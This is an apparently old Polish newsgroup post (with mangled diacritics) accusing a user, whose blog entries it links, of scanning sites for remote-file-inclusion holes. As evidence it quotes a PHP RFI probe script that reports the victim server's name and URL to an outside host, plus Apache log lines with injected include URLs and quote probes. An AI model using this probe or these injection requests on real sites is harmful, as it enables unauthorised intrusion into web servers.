w sprawie usera ZaBeaTy

heja,

Jestem w³a¶nie po lekturze:
http://zetbete.bblog.pl/wpis,zrobiono;ze;mnie;hackera,8275.html
http://zetbete.bblog.pl/wpis,spowrotem;na;laczach,10858.html

Pozwolê sobie zatem dorzuciæ ku potomno¶ci 3 grosze w postaci skryptu typu
PHP injection: http://webp.szu.pl/tc.txt

<?php
file('http://www.zbt.mtvk.pl/hk/save.php?rfi=' .
base64_encode($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']));
echo base64_decode('PFJlbW90ZUZpbGVJbmNsdXNpb24+');
?>

oraz logów apacza:

210.245.120.9 - - [05/Jul/2008:16:20:03
+0200] "GET /index.php?m=opl&amp;pg_id=105' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:18:14:07
+0200] "GET /index.php?m=page&pg_id=93' HTTP/1.0" 403
1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:38
+0200] "GET /index.php?m=http://www.webp.szu.pl/tc.txt?&amp;pg_id=15
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"
210.245.120.9 - - [06/Jul/2008:23:15:39
+0200] "GET /index.php?m=page&amp;pg_id=http://www.webp.szu.pl/tc.txt?
HTTP/1.0" 403 1050 "-" "-" "-" "-" "-"

Wynika st±d do¶æ jednoznacznie, ¿e dla u¿ytkownik ZaBeaTy pierwsz± rzecz±
jak± zrobi³ po odzyskaniu dostêpu do klawiatury by³o odpalenie skryptu
poszukuj±cego serwisów podatnych na RFI.

-- 
Pozdrawiam
Lemat